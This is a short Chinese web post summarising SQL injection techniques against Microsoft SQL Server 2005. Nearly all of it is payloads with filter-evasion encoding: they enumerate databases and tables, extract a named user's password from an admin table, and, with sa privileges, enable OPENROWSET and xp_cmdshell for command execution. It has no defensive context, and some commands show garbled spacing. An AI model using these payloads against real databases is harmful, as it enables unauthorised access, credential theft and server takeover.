微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

mssql2005注入方法小结

爆库语句,修改红色部分的数字挨个猜出库
//and//(select//top//1//isnull(cast([name]//as//nvarchar(500)),char(32))%2bchar(124)//from//[master].[dbo].[sysdatabases]//where//dbid//in//(select//top//1//dbid//from//[master].[dbo].[sysdatabases]//order//by//dbid//desc))%3d0-- 爆表语句,somedb部份是所要列的数据库,红色数字1累加
//and//(select//top//1//cast(name//as//varchar(200))//from//(select//top//1//name//from//somedb.sys.all_objects//where//type%3dchar(85)//order//by//name)//t//order//by//name//desc)%3d0-- 爆字段语句,爆表admin里user='icerover'的密码段
//And//(Select//Top//1//isNull(cast([password]//as//varchar(2000)),char(32))%2bchar(124)//From//(Select//Top//1//[password]//From//[somedb]..[admin]//Where//user='icerover'//Order//by//[password])//T//Order//by//[password]Desc)%3d0-- mssql2005认没有开xp_cmdshell的,openrowset也不能用
如果是sa权限,可以这样来开启 开启openrowset
EXEC/
/sp_configure//'show//advanced//options',//1;RECONfigURE;--
EXEC//sp_configure//'Ad//Hoc//distributed//Queries',//1;RECONfigURE;-- 开启xp_cmdshell
EXEC//sp_configure//'Ad//Hoc//distributed//Queries',1;RECONfigURE;--
EXEC/
/sp_configure//'show//advanced//options',1;RECONfigURE;EXEC//sp_configure/**/'xp_cmdshell',1;RECONfigURE;--

原文地址:https://www.jb51.cc/mssql/64513.html

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。

相关推荐